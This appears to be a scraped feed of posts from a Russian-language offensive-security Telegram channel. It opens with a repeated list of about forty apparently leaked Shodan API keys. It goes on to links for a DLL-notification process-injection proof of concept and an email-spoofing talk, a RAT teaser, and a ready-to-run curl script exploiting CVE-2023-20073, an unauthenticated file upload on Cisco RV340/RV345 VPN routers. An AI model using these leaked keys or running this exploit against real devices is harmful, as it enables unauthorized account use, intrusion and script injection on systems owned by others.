SHODAN keys успевайте
OefcMxcunkm72Po71vVtX8zUN57vQtAC
PSKINdQe1GyxGgecYz2191H2JoS9qvgD
pHHlgpFt8Ka3Stb5UlTxcaEwciOeF2QM
61TvA2dNwxNxmWziZxKzR5aO9tFD00Nj
xTbXXOSBr0R65OcClImSwzadExoXU4tc
EJV3A4Mka2wPs7P8VBCO6xcpRe27iNJu
mEuInz8UH1ixLGJq4oQhEiJORERVG5xc
lkY0ng0XMo29zEhzyw3ibQfeEBxghwPF
syeCnFndQ8TE4qAGvhm9nZLBZOBgoLKd
7TeyFZ8oyLulHwYUOcSPzZ5w3cLYib61
v4YpsPUJ3wjDxEqywwu6aF5OZKWj8kik
dTNGRiwYNozXIDRf5DWyGNbkdiS5m3JK
kdnzf4fsYWQmGajRDn3hB0RElbUlIaqu
boYedPn8iDWi6GDSO6h2kz72VLt6bZ3S
FQNAMUdkeqXqVOdXsTLYeatFSpZSktdb
OygcaGSSq46Lg5fZiADAuFxl4OBbn7zm
XAbsu1Ruj5uhTNcxGdbGNgrh9WuMS1B6
nkGd8uVE4oryfUVvioprswdKGmA5InzZ
XYdjHDeJM36AjDfU1feBsyMJIj8XxGzD
EBeU0lGqtIO6yCxVFCWC4nUVbvovtjo5
OefcMxcunkm72Po71vVtX8zUN57vQtAC
PSKINdQe1GyxGgecYz2191H2JoS9qvgD
pHHlgpFt8Ka3Stb5UlTxcaEwciOeF2QM
61TvA2dNwxNxmWziZxKzR5aO9tFD00Nj
xTbXXOSBr0R65OcClImSwzadExoXU4tc
EJV3A4Mka2wPs7P8VBCO6xcpRe27iNJu
mEuInz8UH1ixLGJq4oQhEiJORERVG5xc
lkY0ng0XMo29zEhzyw3ibQfeEBxghwPF
syeCnFndQ8TE4qAGvhm9nZLBZOBgoLKd
7TeyFZ8oyLulHwYUOcSPzZ5w3cLYib61
v4YpsPUJ3wjDxEqywwu6aF5OZKWj8kik
dTNGRiwYNozXIDRf5DWyGNbkdiS5m3JK
kdnzf4fsYWQmGajRDn3hB0RElbUlIaqu
boYedPn8iDWi6GDSO6h2kz72VLt6bZ3S
FQNAMUdkeqXqVOdXsTLYeatFSpZSktdb
OygcaGSSq46Lg5fZiADAuFxl4OBbn7zm
XAbsu1Ruj5uhTNcxGdbGNgrh9WuMS1B6
nkGd8uVE4oryfUVvioprswdKGmA5InzZ
XYdjHDeJM36AjDfU1feBsyMJIj8XxGzD
EBeU0lGqtIO6yCxVFCWC4nUVbvovtjo5
🔥61😱11👍8
DllNotificationInection
Используя концепцию обратных вызовов уведомлений DLL в локальных и удаленных процессах можно вызвать Calc )
*
WriteUp "must have"
*
POC
Используя концепцию обратных вызовов уведомлений DLL в локальных и удаленных процессах можно вызвать Calc )
*
WriteUp "must have"
*
POC
👍10😱6
Если нужно быстро сориентироваться по системным вызовам ядра Linux.
Числа и параметры для различных архитектур и версий ядра.
https://syscalls.mebeim.net
#linux #syscalls #arch
Числа и параметры для различных архитектур и версий ядра.
https://syscalls.mebeim.net
#linux #syscalls #arch
🔥19👍4
Proxy Bar
Продолжаем публиковать материалы с DefCon 31 SpamChannel Подделка писем с любого домена с помощью MailChannels (+2 миллиона доменов) Упор как всегда на DNS записи SPF и DMARC Пыщь/download
YouTube
SpamChannel: Impersonating Satan
This video demonstrates spoofing an email as Satan from churchofsatan.com using a Cloudflare Worker & MailChannels.
This was one of the demos in my Defcon 31 talk noscriptd "SpamChannel: Spoofing Emails From 2 Million+ Domains and Virtually Becoming Satan"…
This was one of the demos in my Defcon 31 talk noscriptd "SpamChannel: Spoofing Emails From 2 Million+ Domains and Virtually Becoming Satan"…
👍8
This media is not supported in your browser
VIEW IN TELEGRAM
Я календарь переверну
И снова RATник в сентябре
И снова RATник в сентябре
🔥22👍6😱2
CVE-2023-20073
Загрузка произвольного файла без проверки подлинности (XSS) в VPN-маршрутизаторах:
Cisco RV340, RV340W, RV345, RV345P
Usage:
Загрузка произвольного файла без проверки подлинности (XSS) в VPN-маршрутизаторах:
Cisco RV340, RV340W, RV345, RV345P
Usage:
#!/usr/bin/bash
TARGET="https://0.0.0.0"; \
FILENAME="login.html"; \
echo "<b>CVE-2023-20073</b> exploit test.<br><noscript>alert('JS-test')</noscript>" > $FILENAME; \
curl -ksX POST "$TARGET/api/operations/ciscosb-file:form-file-upload" -H "Authorization: 1" -F "pathparam=Portal" -F "fileparam=${FILENAME}" -F "file.path=${FILENAME}" -F "file=@${FILENAME};type=application/octet-stream"; \
echo "Access the uploaded file through the following link: $TARGET/$FILENAME"
#cisco👍14